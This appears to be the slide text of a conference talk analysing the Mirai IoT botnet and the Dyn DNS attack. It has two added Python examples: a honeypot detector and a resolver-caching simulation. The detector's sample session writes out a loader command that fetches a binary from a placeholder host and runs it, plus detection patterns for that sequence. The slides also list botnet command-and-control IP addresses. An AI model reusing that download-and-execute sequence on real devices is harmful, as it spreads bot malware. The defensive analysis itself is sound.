
SESSION ID: HTA-W10
Mirai and IoT Botnet Analysis

http://blog.erratasec.com


@ErrataRob

What this talk will cover
Brief overview of Mirai
The cameras themselves
Step by step from infection to attacks
The Dyn attack
How to protect yourself
How tech details fit into government policy debate
Mirai botnet
Terabit-scale attacks at the end of 2016
~600 Gbps against
~1 terabit against OVH
~1.2 terabit against Dyn
Infects cameras
Mostly cameras
Also printers, routers
Hundreds of thousands of devices
Where the botnet resides

https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html

CnC servers
192.227.222.73 192.227.222.74 192.227.222.75 192.227.222.76 188.166.65.12 188.166.189.189 185.25.51.115 185.144.29.7 118.89.41.125 93.158.216.170 54.187.144.227 52.163.49.59 46.166.185.34 46.183.223.229 45.119.127.190 35.162.249.35 5.249.154.190

Ordering camera

from at CNN

Packaging from Shenzhen

What do the cameras look like?

HiSilicon HI3518 CPU

Which ports are listening?

What does the camera look like?
23: Telnet
9527: some weird shell with no auth
8899: some other web interface

0f539bd5d3ab8a

Camera/Phone firewalled
54.163.237.146 ec2-54-163-237-146.compute-1.amazonaws.com

Configure firewall
Use a Raspberry Pi-class device as NAT/firewall to create an isolated subnet

http://blog.erratasec.com/2016/10/configuring-raspberry-pi-as-router.html

98 seconds to infection!

Infection process

The ECCHI trick
The bot appends a bogus BusyBox applet name (ECCHI) to each command, which generates an error message
That error message is how the bot recognizes that the command's output is done
Different devices have different command prompts, so parsing output for a prompt would be harder

What is busybox?
Most common shell on IoT devices

Find out CPU:
x86, ARM, MIPS, PowerPC

Download bot

Now run the bot

Kills Telnet
/bin/busybox telnetd -p 2323

Kills rival bots

Connect to command/control
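The loader steps listed above (the ECCHI marker after every command, the CPU probe, the bot download, running it, killing telnetd) are exactly what a telnet honeypot or an IDS watching port 23 sees, so they make a usable detection signature. What follows is an added example, not code from the talk or from Mirai: a small Python classifier run over a constructed session transcript. The marker string ECCHI is taken from the public Mirai source the talk links (the slide spells it ECHI); the transcript format, the stage patterns, the verdict thresholds and the addresses (TEST-NET documentation ranges) are this example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict

# Constructed telnet honeypot transcript (not captured from the talk's camera).
# ">" lines are what the scanner sent, "<" lines what the device answered.
# Addresses come from the TEST-NET documentation ranges.
SAMPLE_SESSION = """\
> sh
> /bin/busybox ECCHI
< ECCHI: applet not found
> cat /proc/cpuinfo; /bin/busybox ECCHI
< Processor : ARM926EJ-S rev 5 (v5l)
< ECCHI: applet not found
> cd /tmp; /bin/busybox wget http://198.51.100.7/x.arm -O x; /bin/busybox ECCHI
< ECCHI: applet not found
> chmod +x x; ./x; /bin/busybox ECCHI
< ECCHI: applet not found
> killall -9 telnetd; /bin/busybox ECCHI
< ECCHI: applet not found
"""

# An ordinary admin session on the same device, also constructed.
BENIGN_SESSION = """\
> cat /proc/cpuinfo
< Processor : ARM926EJ-S rev 5 (v5l)
> ls /etc
< passwd init.d
"""

# The bogus applet name: BusyBox answers "<name>: applet not found", and the
# loader uses that line as its end-of-output marker (string from Mirai source).
MARKER_SENT = re.compile(r"/bin/busybox\s+ECCHI\b")
MARKER_REPLY = re.compile(r"ECCHI: applet not found")

# Loader stages from the talk; the regexes are this example's assumptions.
STAGE_PATTERNS = {
    "cpu_probe": re.compile(r"/proc/cpuinfo|cat\s+/bin/echo"),
    "download": re.compile(r"\b(wget|tftp|ftpget)\b"),
    "execute": re.compile(r"chmod\s+(\+x|[0-7]{3,4})\s+\S+"),
    "kill_telnet": re.compile(r"\bkill\w*\b.*\btelnetd\b"),
}


@dataclass
class SessionReport:
    marker_sent: int
    marker_replies: int
    stages: Dict[str, bool]
    verdict: str


def analyze(transcript: str) -> SessionReport:
    """Score one telnet session. A lone stage (e.g. an admin reading
    /proc/cpuinfo) is not enough; the marker plus two stages is."""
    sent = replies = 0
    stages = {name: False for name in STAGE_PATTERNS}
    for raw in transcript.splitlines():
        if not raw or raw[0] not in "<>":
            continue                                   # skip malformed lines
        direction, text = raw[0], raw[1:].strip()
        if direction == ">":
            sent += len(MARKER_SENT.findall(text))
            for name, pattern in STAGE_PATTERNS.items():
                if pattern.search(text):
                    stages[name] = True
        else:
            replies += len(MARKER_REPLY.findall(text))
    hits = sum(stages.values())
    if sent >= 2 and replies >= 2 and hits >= 2:
        verdict = "mirai-like"
    elif sent or replies:
        verdict = "suspicious"                         # marker alone: scanner probing
    else:
        verdict = "benign"
    return SessionReport(sent, replies, stages, verdict)


if __name__ == "__main__":
    for label, session in (("sample", SAMPLE_SESSION), ("benign", BENIGN_SESSION)):
        print(label, analyze(session))
```

The marker is the most reliable signal because it is device-independent: whatever the camera's prompt looks like, the "applet not found" line is emitted by BusyBox itself, which is why the loader relies on it and why a honeypot can key on it too.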

List of possible attacks

Attack on Google Project Shield
130 million SYN per second
450 million HTTP queries per second
From 175,000 IP addresses
4 million ACK flood
GRE floods
UDP floods
https://arstechnica.com/security/2017/02/how-google-fought-back-against-a-crippling-iot-powered-botnet-and-won/

Classic "hit the root name servers" attack, except one layer down
Port 53 UDP flood, ~600 Gbps to ~1.2 Tbps
Amplified by failed DNS lookups: a failed response is not cached, so every retry goes back to the flooded server

Dyn uses ‘anycast’

http://dyn.com/dns/network-map/

Atlanta -> North Virginia

Add own second DNS

Add Amazon DNS

All eggs in one basket

BGP changes

https://stat.ripe.net/widget/bgplay#w.resource=208.78.70.16

Increase TTLs

Resolver caching
Resolvers cache responses
They drop a record after TTL seconds and fetch a new one
Change: if you can't get a new one, don't drop the record

Everybody’s doing it
No persistence in botnet
Many fight to take control of the devices
Many splintered botnets rather than one large botnet

Conclusion
The same attack won’t work again

https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/

Complicated
Paras Jha, 20 year old student
Minecraft server maintainer, then anti-DDoS company
Way to drive customers from other anti-DDoS companies
Complicated interactions with the underground

Source code
Amateurish, like that of 20 year old students
Doesn't mean "stupid", just lacking the habits of professional coders
Multiple coders
https://github.com/jgamblin/Mirai-Source-Code

Apply: How to protect yourself?
You probably don't have cameras
Vulnerability scanning for them on your network is probably pointless
You need a DNS strategy
You need a DDoS strategy
You need a UPnP strategy

DNS server strategy
Use redundant servers
One should be a server that can handle DDoS
Set longer TTLs

DNS client strategy
Set up your own resolver
Disable discarding stale records after the TTL if there is no response
Make sure services can keep running if DNS fails
The DNS supply chain
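The three DNS points the talk makes (the Dyn flood was amplified by uncached failed lookups, resolvers should keep a stale record when they cannot refresh it, and longer TTLs ride out an outage) can be checked against each other in a small simulation. The following is an added example, not code from the talk: a toy caching resolver in Python in front of a constructed authoritative server that goes unreachable partway through the run. The name, the address (TEST-NET), the timings and the three policy knobs are this example's own assumptions; the "serve stale" behaviour is the change the talk asks for, not the default of any particular resolver.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass
class Record:
    value: str
    ttl: int
    fetched_at: int


class Upstream:
    """Constructed authoritative server. `up = False` models it being
    flooded: every query times out, as Dyn's did during the attack."""

    def __init__(self, zone: Dict[str, Tuple[str, int]]):
        self.zone = zone
        self.up = True
        self.queries = 0              # load the resolver puts on the server

    def query(self, name: str) -> Tuple[str, int]:
        self.queries += 1
        if not self.up or name not in self.zone:
            raise TimeoutError(name)
        return self.zone[name]


class Resolver:
    """Caching resolver. `serve_stale` keeps an expired record while the
    upstream is unreachable; `fail_retry` is how many seconds to wait before
    asking again after a failure (0 = ask upstream on every client query,
    which is the retry storm that amplified the flood)."""

    def __init__(self, upstream: Upstream, serve_stale: bool, fail_retry: int):
        self.upstream = upstream
        self.serve_stale = serve_stale
        self.fail_retry = fail_retry
        self.cache: Dict[str, Record] = {}
        self.last_failure: Dict[str, int] = {}

    def resolve(self, name: str, now: int) -> Optional[str]:
        rec = self.cache.get(name)
        if rec and now - rec.fetched_at < rec.ttl:
            return rec.value                              # fresh cache hit
        failed_at = self.last_failure.get(name)
        if failed_at is not None and now - failed_at < self.fail_retry:
            # Recently failed: don't hammer the upstream; serve stale if allowed.
            return rec.value if (self.serve_stale and rec) else None
        try:
            value, ttl = self.upstream.query(name)
        except TimeoutError:
            self.last_failure[name] = now
            if self.serve_stale and rec:
                return rec.value                          # stale but usable
            self.cache.pop(name, None)                    # classic: drop it
            return None
        self.last_failure.pop(name, None)
        self.cache[name] = Record(value, ttl, now)
        return value


def simulate(serve_stale: bool, fail_retry: int, ttl: int = 60,
             outage_start: int = 100, duration: int = 600,
             step: int = 5) -> Dict[str, int]:
    """One client asks every `step` seconds for `duration` seconds; the
    upstream goes down at `outage_start` and stays down. Returns counts."""
    upstream = Upstream({"www.example.com": ("203.0.113.10", ttl)})
    resolver = Resolver(upstream, serve_stale, fail_retry)
    answered = failed = 0
    for now in range(0, duration, step):
        upstream.up = now < outage_start
        if resolver.resolve("www.example.com", now) is None:
            failed += 1
        else:
            answered += 1
    return {"answered": answered, "failed": failed,
            "upstream_queries": upstream.queries}


if __name__ == "__main__":
    print("classic resolver, 60 s TTL:   ", simulate(False, 0))
    print("serve stale, retry every 30 s:", simulate(True, 30))
    print("classic resolver, 600 s TTL:  ", simulate(False, 0, ttl=600))
```

With the classic policy the client gets answers only until the cached record expires, and after that every single lookup is a new query against the server that is already under attack. Serving stale answers keeps the client working for the whole outage while the resolver retries upstream on a throttle, and the long-TTL run shows the server-side half of the advice: one fetch before the outage covers the entire window.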

Apply: Policy question
For government policy makers crafting laws/regulations
What can government do to ward off IoT botnets?

It's a complicated answer
Only 10.9% are in the United States
Unbranded grey market, where they ignore regulation anyway
IoT is behind firewalls; cameras are exposed. This was not an IoT botnet
Cameras need remote reset (aka a backdoor)
Dyn fixed itself, without government help

An IoT threat model, part 1
No user interaction
Clicking on links/emails is how you infect your desktop/laptop, but mostly not iPhones
No exposed ports
At least, as the norm
So no directly vulnerable services, OWASP, etc.

An IoT threat model, part 2
Cross Site Request Forgery
Clicking on links/emails
Cloud service
Phishing of username/password
Cloud provider gets owned
IoT autoupdate considered harmful
Local WiFi
UPnP etc. for inbound

An IoT threat model, part 3
Vendors demand inbound connections
Old IoT like medical devices, HVAC, etc.
IoT on non-private networks
Hospitals, bars, universities, etc.
IPv4 vs IPv6
IPv4 for IoT increasingly costly, moving to IPv6

Details on how Mirai works
Means knowing how cameras work
How to protect yourself from Mirai
Not Mirai itself, but the attacks it does
Fix your DNS
What is the future?
What's the threat model?
How can regulations help?
